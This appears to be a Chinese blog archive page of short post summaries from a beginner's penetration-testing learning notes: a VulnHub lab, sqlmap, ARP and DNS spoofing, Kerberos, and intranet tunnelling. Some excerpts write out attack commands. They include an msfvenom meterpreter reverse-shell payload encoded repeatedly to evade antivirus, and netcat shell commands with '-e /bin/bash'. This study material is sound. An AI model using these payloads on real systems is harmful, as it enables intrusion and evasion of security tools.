2020年3月4日
vulnhub靶场之AI-WEB1.0渗透记录
摘要: 在本机电脑上自行搭建了一个练手的靶场,下面是记录渗透过程 目录 一、确认靶机ip 二、端口&目录扫描 三、查看敏感目录 四、sql注入 五、get shell 六、系统提权 确认靶机ip kali下有个工具可以扫描ip:netdiscover 看看哪一个比较可疑,在浏览器访问,最终确认是172 整理 阅读全文
posted @ 2020-03-04 14:54 simon7s 阅读(784) 评论(0) 推荐(0) 编辑
python -m http.server 搭建一个简易web下载服务器
摘要: 在打vulnhub靶场的时候遇到的一个问题目录一、进到需要发送的安装包目录二、开启http服务三、访问服务器一、进到需要发送的安装包目录比如设置一个专门发送,传输的文件的文件夹,cmd命令打开即可以二、开启http服务 python2 python -m SimpleHTTPServer 9000 阅读全文
posted @ 2020-03-04 05:38 simon7s 阅读(5428) 评论(0) 推荐(0) 编辑
2020年3月3日
渗透测试工具-sqlmap
摘要: 简单来说:一个用来做sql注入攻击的工具安装1,下载sqlmap.zip,下载环境;打开sqlmap官网https://github.com/sqlmapproject/sqlmap/ ;下载python-2.7.17.amd64.msi2.配置环境变量;(控制面板->系统和安全->系统->高级系统设置->环境变量)找到path 新建黏贴python地址(不明白的话可以自行百度,这就不细说安装了)... 阅读全文
posted @ 2020-03-03 15:29 simon7s 阅读(513) 评论(0) 推荐(0) 编辑
OSI七层模型
摘要: 在讲解osi七层模型之前,先认识一下网络认识网络:(一个家庭的网络)当我们家庭想要接网线时,运营商的人会在离你最近的一个站点,拉一根光纤到你家。然后光纤插到调制解调器(俗称的猫)的一端,猫的另一端连接我们的路由器。于是我们的路由器就具有连接外网的功能了。我们的台式机通过网线和路由器相连,我们的智能手机等其他的移动终端通过路由器的WIFI和外网相连。我们分配的IP地址是路由器通过DHCP分配的,分配... 阅读全文
posted @ 2020-03-03 14:21 simon7s 阅读(244) 评论(0) 推荐(0) 编辑
2020年3月2日
kerberos协议
摘要: 学习了解kerberos协议,有助于我们后期理解黄金票据和白银票据的原理kerberos协议介绍kerberos 是一种由MIT(麻省理工大学)提出的一种网络身份验证协议,它旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。kerberos协议中主要由三个角色:(1)访问服务的client(一下表述为Client或者用户)(2)提供服务的server(一下表述为服务)(3)KDC(K... 阅读全文
posted @ 2020-03-02 17:13 simon7s 阅读(600) 评论(0) 推荐(0) 编辑
DNS欺骗&嗅探监听
摘要: 承接上一章,除了arp欺骗之外对的欺骗方法a)使用kali,对dns文件进行编辑使用的欺骗工具是ettercap。对dns文件编辑:添加一个A记录,解释到kali自身:b)进行欺骗通过命令行模式打开图形界面,选择Unified sniffing以中间人的方式进行嗅探选择网卡,开那个段上就选择那个段上的网卡选择dns_spoofc) 最后我们开始我们的dns欺骗,点击Start sniffing然后... 阅读全文
posted @ 2020-03-02 16:32 simon7s 阅读(678) 评论(0) 推荐(0) 编辑
linux下的ARP攻击(kali)
摘要: 这是我的学习总结,刚入坑网络安全,写的不好或者有什么错误的希望大佬们指正 首先了解ARP的作用以及原理: ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP栈中的网络层,负责将某个ip地址解析成对应的MAC地址,ARP协议的基本功能就是通过目标设备的 阅读全文
posted @ 2020-03-02 15:38 simon7s 阅读(3040) 评论(0) 推荐(0) 编辑
隐匿攻击
摘要: 免杀 msfvenom encoder编码器 -e 编码器 -i 编码次数 多次编码 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.5.172 lport=4444 -e x86/shikata_ga_nai -i 15 阅读全文
posted @ 2020-03-02 02:56 simon7s 阅读(217) 评论(0) 推荐(0) 编辑
跨边界传输之反弹shell
摘要: 反弹shell 1.nc 正向连接 攻击机 nc-vv 受害者ip 受害者port 受害者 nc-lvvp受害者port - e /bin/bash 反向连接 攻击机 nc -lvvp 攻击机... 阅读全文
posted @ 2020-03-02 02:51 simon7s 阅读(582) 评论(0) 推荐(0) 编辑
跨边界传输之内网代理
摘要: 内网代理 http tunnel reDuh reGeorg 1.python2 安装 urllib3库 2.上传tunnel.nosocket.php代理脚本到web服务器 3.访问url,确认web服务器删tunnel。nosocket.php能够执行 4.... 阅读全文
posted @ 2020-03-02 02:50 simon7s 阅读(209) 评论(0) 推荐(0) 编辑